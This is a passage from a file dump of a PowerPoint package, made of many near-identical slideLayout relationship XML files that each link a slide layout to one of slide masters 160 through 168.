</file>

<file path=ppt/slideLayouts/_rels/slideLayout1593.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster160.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1594.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster160.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1595.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster160.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1596.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster160.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1597.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster160.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1598.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster160.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1599.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster160.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0.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00.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster160.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1601.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1602.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1603.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1604.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1605.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1606.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1607.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1608.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1609.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout161.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610.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster161.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1611.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1612.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1613.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1614.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1615.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1616.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1617.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1618.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1619.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout162.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620.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster162.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1621.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1622.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1623.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1624.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1625.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1626.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1627.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1628.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1629.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout163.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630.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster163.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1631.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1632.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1633.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1634.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1635.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1636.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1637.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1638.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1639.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout164.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640.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster164.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1641.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1642.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1643.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1644.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1645.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1646.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1647.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1648.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1649.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout165.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650.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster165.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1651.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1652.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1653.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1654.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1655.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1656.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1657.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1658.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1659.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout166.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660.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster166.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1661.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1662.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1663.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1664.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1665.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1666.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1667.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1668.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1669.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout167.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670.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster167.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1671.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster168.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1672.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster168.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1673.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster168.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1674.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster168.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1675.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster168.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1676.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster168.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1677.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
